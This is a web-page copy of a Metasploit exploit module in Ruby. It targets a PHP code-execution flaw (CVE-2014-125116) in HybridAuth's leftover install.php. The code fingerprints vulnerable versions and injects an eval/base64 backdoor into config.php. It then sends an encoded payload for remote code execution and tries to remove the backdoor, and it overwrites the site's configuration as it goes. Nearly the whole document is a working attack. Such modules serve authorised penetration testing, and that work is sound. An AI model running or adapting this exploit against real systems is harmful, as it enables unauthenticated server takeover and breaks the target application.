Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
28523 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ManualRanking # application config.php is overwritten

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'HybridAuth install.php PHP Code Execution',

16
        'Description' => %q{

17
          This module exploits a PHP code execution vulnerability in

18
          HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'

19
          is not removed after installation allowing unauthenticated users to

20
          write PHP code to the application configuration file 'config.php'.

21


22
          Note: This exploit will overwrite the application configuration file

23
          rendering the application unusable.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Pichaya Morimoto', # Discovery and PoC

28
          'bcoles' # Metasploit

29
        ],

30
        'References' => [

31
          ['CVE', '2014-125116'],

32
          ['EDB', '34273'],

33
          ['OSVDB', '109838']

34
        ],

35
        'Arch' => ARCH_PHP,

36
        'Platform' => 'php',

37
        'Targets' => [

38
          # Tested:

39
          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)

40
          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]

41
        ],

42
        'Privileged' => false,

43
        'DisclosureDate' => '2014-08-04',

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])

56
      ]

57
    )

58
  end

59


60
  #

61
  # Check:

62
  # * install.php exists

63
  # * config.php is writable

64
  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2

65
  #

66
  def check

67
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')

68
    if !res

69
      vprint_error "Connection failed"

70
      return Exploit::CheckCode::Unknown

71
    elsif res.code == 404

72
      vprint_error "Could not find install.php"

73
    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</

74
      vprint_error "#{$1} is not writable"

75
    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</

76
      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first

77
      vprint_status "Found version: #{version}"

78
      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/

79
        return Exploit::CheckCode::Vulnerable

80
      else

81
        vprint_error "HybridAuth version #{version} is not vulnerable"

82
      end

83
    end

84
    Exploit::CheckCode::Safe

85
  end

86


87
  #

88
  # Exploit

89
  #

90
  def exploit

91
    # check vuln

92
    if check != Exploit::CheckCode::Vulnerable

93
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"

94
    end

95


96
    # write backdoor

97
    print_status "Writing backdoor to config.php"

98
    payload_param = rand(1000)

99
    res = send_request_cgi(

100
      'method' => 'POST',

101
      'uri' => normalize_uri(target_uri.path, 'install.php'),

102
      'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"

103
    )

104
    if !res

105
      fail_with Failure::Unknown, "#{peer} - Connection failed"

106
    elsif res.body =~ /Installation completed/

107
      print_good "Wrote backdoor successfully"

108
    else

109
      fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"

110
    end

111


112
    # execute payload

113
    code = Rex::Text.encode_base64(payload.encoded)

114
    print_status "Sending payload to config.php backdoor (#{code.length} bytes)"

115
    res = send_request_cgi({

116
      'method' => 'POST',

117
      'uri' => normalize_uri(target_uri.path, 'config.php'),

118
      'data' => "#{payload_param}=#{code}"

119
    }, 5)

120
    if !res

121
      print_warning "No response"

122
    elsif res.code == 404

123
      fail_with Failure::NotFound, "#{peer} - Could not find config.php"

124
    elsif res.code == 200 || res.code == 500

125
      print_good "Sent payload successfully"

126
    end

127


128
    # remove backdoor

129
    print_status "Removing backdoor from config.php"

130
    res = send_request_cgi(

131
      'method' => 'POST',

132
      'uri' => normalize_uri(target_uri.path, 'install.php'),

133
      'data' => 'OPENID_ADAPTER_STATUS='

134
    )

135
    if !res

136
      print_error "Connection failed"

137
    elsif res.body =~ /Installation completed/

138
      print_good "Removed backdoor successfully"

139
    else

140
      print_warning "Could not remove payload from config.php"

141
    end

142
  end

143
end

144


145